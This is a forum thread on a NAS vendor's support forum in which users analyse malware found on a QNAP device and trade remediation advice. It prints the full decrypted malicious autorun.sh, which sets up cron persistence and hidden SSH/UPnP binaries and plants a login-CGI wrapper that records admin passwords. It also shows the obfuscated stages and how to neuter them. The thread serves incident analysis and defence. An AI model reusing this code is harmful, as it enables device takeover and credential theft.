$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}


#]

Thank you.
The Router is an ISP router, the nas is a QNAP nas, all software are up-to-date, the malware vehicle is one of the nas services. I exposed the nas to the network with 2fa strong password ecc ecc but it was not enough.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 1:08 am
by somy1982
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies

not too cheap 300euro :/

Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 1:10 am
by somy1982
Mousetick wrote:This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Decrypted autorun.sh:

Code: Select all

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}


#]

Hi MouseTick,
Thanks for the reply! Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
I don't get the point why to disconnect from LAN?

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 1:14 am
by somy1982
Also another question, is the following cron job save:
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 1:49 am
by benzo83
somy1982 wrote:
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies

not too cheap 300euro :/

Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.

unfortunately i do :cry:

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:04 am
by Don
You disconnect from the LAN to protect other devices on the LAN from being compromised by the NAS infection.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:04 am
by Mousetick
somy1982 wrote:Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.

The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.

I greatly discourage you try to do this if you don't understand fully what I just said and what follows.

Example: autorun.sh posted by benzo83. Look for the note "<<<<<<<<<<============ DANGEROUS PART HERE" (added by me).

Code: Select all

#!/bin/sh

WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx

...remainder omitted for brevity...

Before neutering

Code: Select all

'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE

After neutering

Code: Select all

'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"

Executing the neutered script produces the following ouput, another encrypted script:

Code: Select all

#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/

... remainder omitted for brevity ...

Before neutering

Code: Select all

Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE

After neutering

Code: Select all

Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"

Executing the neutered 2nd stage script, produces the following output, the unencrypted autorun.sh:

Code: Select all

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }

... remainder omitted for brevity ...


Post your script(s) here and I'll see what I can do.

I don't get the point why to disconnect from LAN?

As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:08 am
by somy1982
benzo83 wrote:
somy1982 wrote:
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies

not too cheap 300euro :/

Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.

unfortunately i do :cry:

Check all apps under .qpkg folder - reinstall them all if you can. I found many sh scripts infected. Also the ones malware remover claimed recovered!! When exactly on 25/8 did the file created? Mine wa around 9am Europe time.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:27 am
by Mousetick
Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.

AutorunDisable.png

This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:52 am
by somy1982
Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.

AutorunDisable.png

This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.

Thanks, have done that and removed the autorun.sh. Delete everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs are removed permanently seems.
Today I go into .qpkg folder and found many files being hacked, now I reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch :-(
Anybody know if QNAP provide a way to completely reset QTS OS and leave data unchanged?